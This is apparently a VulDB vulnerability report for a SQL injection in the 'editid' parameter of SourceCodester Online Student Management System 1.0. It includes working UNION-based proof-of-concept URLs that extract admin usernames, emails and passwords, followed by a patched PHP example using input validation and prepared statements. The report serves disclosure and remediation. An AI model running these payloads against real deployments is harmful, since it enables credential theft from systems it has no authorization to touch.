| Field | Value |
|---|---|
| Title | eduAuthorities SQL Injection |
| Description | see below |
| User | 0chen (UID 41914) |
| Submitted | 2023-02-28 08:35 AM (3 years ago) |
| Moderation | 2023-02-28 09:03 PM (12 hours later) |
| Status | Accepted |
| VulDB entry | 222002 [SourceCodester Online Student Management System 1.0 edit-class-detail.php editid SQL injection] |
| Points | 17 |

Description:

Download link: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html

Version environment:
PHP 7.3.4
MySQL 5.7.26
Apache 2.4.39

Preparation:
Create a "student" database in MySQL.
Set the database username and password in "dbconnection.php", then open http://localhost/eduauth/index.php and log in with the account and password.

Vulnerability:
http://localhost/eduauth/edit-class-detail.php?editid=1
On line 54 of the "edit-class-detail.php" file, the parameter "editid" is not filtered and can be exploited directly.
http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName),3,4%20from%20tbladmin#
The data selected by the injected query is returned in the response.

PoC:
http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName,'~',Email,'·',Password),3,4%20from%20tbladmin#

Vulnerability principle:
Check the "edit-class-detail.php" file.
On line 55, the user-supplied parameter "editid" is concatenated directly into the SQL statement, and on line 57 that statement is executed.
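The pattern the report describes (a raw "editid" value spliced into the query) beside a hardened version that validates the type and binds the value as a parameter. This is an added example, not code from the Online Student Management System; the query shape, the table name "tblclass" and its column names are assumptions, and only the script name and the "editid" parameter come from the submission.

```php
<?php
// Added example for this report; it is not code from the Online Student
// Management System. The query shape, the table name "tblclass" and its
// column names are assumptions; only the script name and the "editid"
// parameter come from the submission.
declare(strict_types=1);

// Vulnerable shape described in the report (assumed reconstruction): the
// raw GET value is concatenated into the statement, so input such as
// "-3 union select ..." is parsed as SQL rather than treated as a number.
function vulnerableClassLookup(mysqli $con, array $get)
{
    $editid = $get['editid'];
    $sql = "SELECT ID, ClassName, Section, Status FROM tblclass WHERE ID = $editid";
    return mysqli_query($con, $sql);
}

// Hardened form: validate the type first, then bind the value as a
// parameter so the database never interprets it as part of the query.
function safeClassLookup(mysqli $con, array $get): ?array
{
    // editid is a row id; anything other than a positive integer is rejected
    // before it reaches the database.
    $editid = filter_var(
        $get['editid'] ?? '',
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($editid === false) {
        http_response_code(400);
        return null;
    }

    $stmt = $con->prepare(
        'SELECT ID, ClassName, Section, Status FROM tblclass WHERE ID = ?'
    );
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $editid);   // bound as an integer, never spliced in
    $stmt->execute();
    // get_result() needs the mysqlnd driver, which the PHP 7.3 build listed
    // in the report ships with.
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Usage in edit-class-detail.php (connection values are placeholders):
// $con = new mysqli('localhost', 'DB_USER', 'DB_PASS', 'student');
// $class = safeClassLookup($con, $_GET);
```

The trailing `#` in the PoC URL comments out whatever follows the injected text, which is why escaping quotes alone would not help here: the value is used unquoted as a number. Rejecting anything that is not a positive integer stops the request before any SQL is built, and binding the value with a prepared statement means that even a value which passes validation can never change the query's structure.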